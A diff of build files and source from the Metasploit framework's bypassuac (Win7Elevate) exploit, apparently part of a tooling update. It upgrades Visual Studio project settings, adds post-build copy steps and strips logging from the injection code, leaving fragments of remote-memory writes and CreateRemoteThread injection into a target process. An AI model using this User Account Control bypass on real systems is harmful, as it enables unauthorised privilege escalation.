Vendored
+44 -13
View File
@@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@@ -28,23 +28,27 @@
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@@ -63,26 +67,31 @@
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@@ -90,6 +99,8 @@
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>false</MinimalRebuild>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
@@ -99,6 +110,10 @@
<Path>
</Path>
</BuildLog>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
@@ -106,11 +121,17 @@
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>false</MinimalRebuild>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
@@ -121,6 +142,7 @@
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
@@ -132,6 +154,10 @@
<Path>
</Path>
</BuildLog>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@@ -142,6 +168,7 @@
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
@@ -153,6 +180,10 @@
<Path>
</Path>
</BuildLog>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
external/source/exploits/bypassuac/Win32/.keep
Vendored
View File
external/source/exploits/bypassuac/Win7Elevate.sln
Vendored Regular → Executable
+7 -10
View File
@@ -1,6 +1,8 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
ProjectSection(SolutionItems) = preProject
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
@@ -18,37 +20,32 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4)
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4)
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.Build.0 = Debug|x64
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.Build.0 = Debug|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.Build.0 = Debug|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.cpp
Vendored Regular → Executable
BIN
View File
Binary file not shown.
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.rc
Vendored Regular → Executable
+9 -8
View File
@@ -61,22 +61,23 @@ END
#ifdef _DEBUG
// Z:\code\metasploit-framework\external\source\exploits\bypassuac\TIOR\Debug\Win32
#ifdef _WIN64
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe"
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Debug\\x64\\Win7ElevateDll.x64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Debug\\x64\\TIOR.x64.exe"
#else
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe"
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Debug\\Win32\\Win7ElevateDll.x86.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Debug\\Win32\\TIOR.x86.exe"
#endif
#else // _DEBUG
#ifdef _WIN64
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe"
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Release\\x64\\Win7ElevateDll.x64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Release\\x64\\TIOR.x64.exe"
#else
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe"
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Release\\Win32\\Win7ElevateDll.x86.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Release\\Win32\\TIOR.x86.exe"
#endif
#endif
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.vcxproj
Vendored
+40 -14
View File
@@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@@ -28,23 +28,27 @@
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@@ -63,25 +67,30 @@
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<LinkIncremental>false</LinkIncremental>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<LinkIncremental>false</LinkIncremental>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@@ -96,10 +105,12 @@
<FunctionLevelLinking>false</FunctionLevelLinking>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
</Link>
<BuildLog>
<Path>
@@ -119,10 +130,12 @@
<FunctionLevelLinking>false</FunctionLevelLinking>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
</Link>
<BuildLog>
<Path>
@@ -141,12 +154,14 @@
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<BufferSecurityCheck>false</BufferSecurityCheck>
<WholeProgramOptimization>false</WholeProgramOptimization>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
</Link>
<BuildLog>
<Path>
@@ -155,6 +170,9 @@
<ResourceCompile>
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@@ -168,12 +186,14 @@
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<BufferSecurityCheck>false</BufferSecurityCheck>
<WholeProgramOptimization>false</WholeProgramOptimization>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
</Link>
<BuildLog>
<Path>
@@ -182,6 +202,9 @@
<ResourceCompile>
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="Resource.h" />
@@ -204,7 +227,10 @@
<ClCompile Include="Win7Elevate_Utils.cpp" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Win7Elevate.rc" />
<ResourceCompile Include="Win7Elevate.rc">
<PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">WIN64;_WIN64;_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp
Vendored Regular → Executable
+2 -33
View File
@@ -209,7 +209,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
if (codeStartAdr >= codeEndAdr)
{
//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Unexpected function layout");
return;
}
@@ -220,7 +219,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
{
//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't get path to self");
return;
}
@@ -231,7 +229,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
if (S_OK != hr)
{
//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"SHGetFolderPath failed");
return;
}
@@ -240,7 +237,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
if (hModKernel32 == 0)
{
//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't load kernel32.dll");
return;
}
@@ -257,7 +253,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|| 0 == tfpWaitForSingleObject.f)
{
//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't find API");
}
else
{
@@ -374,26 +369,11 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
if (reme.AnyFailures())
{
//MessageBox(hWnd, L"Remote allocation failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Remote allocation failed");
}
else
if (!(reme.AnyFailures()))
{
HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
if (hRemoteThread == 0)
{
//MessageBox(hWnd, L"Couldn't create remote thread", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(
CError::Format(
GetLastError(),
L"Couldn't create remote thread",
L"CreateRemoteThread"));
}
else
if (hRemoteThread != 0)
{
if ( Redirector )
Redirector();
@@ -415,7 +395,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
else
{
CLogger::LogLine(L"Continue waiting for remote thread to complete? : NO");
// See if it completed before the user asked to stop waiting.
// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
@@ -442,14 +421,4 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
FreeLibrary(hModKernel32);
if (bThreadWaitFailure)
{
//MessageBox(hWnd, L"Error waiting on the remote thread to complete", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Error waiting on the remote thread to complete");
}
else if (bThreadWaitSuccess)
{
//MessageBox(hWnd, L"Remote thread completed", L"Win7Elevate", MB_OK | MB_ICONINFORMATION);
CLogger::LogLine(L"Remote thread completed");
}
}
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Utils.cpp
Vendored Regular → Executable
+2 -14
View File
@@ -33,7 +33,6 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
if (hSnapshot == INVALID_HANDLE_VALUE)
{
//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"CreateToolhelp32Snapshot failed");
}
else
{
@@ -61,17 +60,7 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
{
DWORD dwErr = GetLastError();
if (ERROR_NO_MORE_FILES != dwErr)
{
//MessageBox(hWnd, L"Process32Next/First failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Process32Next/First failed");
}
else if (mapProcs.empty())
{
//MessageBox(hWnd, L"Process32Next/First returned nothing", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Process32Next/First returned nothing");
}
else
if ((ERROR_NO_MORE_FILES == dwErr) && !(mapProcs.empty()))
{
bResult = true;
}
@@ -107,7 +96,6 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
if (szProcName == NULL)
{
//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"No process name passed in");
return false;
}
@@ -140,7 +128,7 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
}
//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(strMsg);
return false;
}
external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj
Vendored
+38 -11
View File
@@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@@ -28,23 +28,27 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@@ -64,25 +68,30 @@
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
